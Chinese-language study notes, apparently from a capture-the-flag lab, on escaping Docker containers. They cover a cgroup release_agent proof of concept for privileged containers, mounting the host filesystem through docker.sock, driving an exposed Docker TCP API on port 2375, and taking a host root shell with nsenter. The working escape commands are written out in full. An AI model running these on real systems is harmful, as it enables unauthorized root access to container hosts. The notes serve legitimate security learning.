特权模式

特权模式下docker可以与操作系统交互

capsh --print打印docker容器具有的功能

比如

capsh --print 
Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid,cap_setuid

poc like

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit

chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Unix Sockets 101

容器里好像得有docker,找到docker.sock的位置/var/run
然后
docker run -v /:/mnt --rm -it alpine chroot /mnt sh提权成功

The Docker Engine - TCP Sockets Edition

TCP套接字

前几天做过,2375端口的

# curl http://10.10.77.104:2375/version
{"Platform":{"Name":"Docker Engine - Community"},"Components":[{"Name":"Engine","Version":"20.10.20","Details":{"ApiVersion":"1.41","Arch":"amd64","BuildTime":"2022-10-18T18:18:12.000000000+00:00","Experimental":"false","GitCommit":"03df974","GoVersion":"go1.18.7","KernelVersion":"5.15.0-1022-aws","MinAPIVersion":"1.12","Os":"linux"}},{"Name":"containerd","Version":"1.6.8","Details":{"GitCommit":"9cd3357b7fd7218e4aec3eae239db1f68a5a6ec6"}},{"Name":"runc","Version":"1.1.4","Details":{"GitCommit":"v1.1.4-0-g5fd4c4d"}},{"Name":"docker-init","Version":"0.19.0","Details":{"GitCommit":"de40ad0"}}],"Version":"20.10.20","ApiVersion":"1.41","MinAPIVersion":"1.12","GitCommit":"03df974","GoVersion":"go1.18.7","Os":"linux","Arch":"amd64","KernelVersion":"5.15.0-1022-aws","BuildTime":"2022-10-18T18:18:12.000000000+00:00"}

docker -H tcp://10.10.77.104:2375 ps

docker -H 就相当于自己主机了

Namespaces

nsenter --target 1 --mount --uts --ipc --net /bin/bash

我们使用值为“1”的 --target 开关来执行我们稍后提供的shell命令,该命令在特殊系统进程ID的命名空间中执行以获得最终的root!
即/sbin/init

指定 --mount ,这是我们提供目标进程的挂载命名空间的地方。 “如果未指定文件,则输入目标进程的挂载命名空间。”
 
--uts 开关允许我们与目标进程共享相同的 UTS 命名空间,这意味着使用相同的主机名。这很重要,因为不匹配的主机名可能会导致连接问题

--ipc 开关意味着我们进入进程的进程间通信命名空间,这一点很重要。这意味着内存可以共享

--net 开关意味着我们进入网络命名空间,这意味着我们可以与系统的网络相关功能进行交互。例如,网络接口。我们可以用它来打开一个新的连接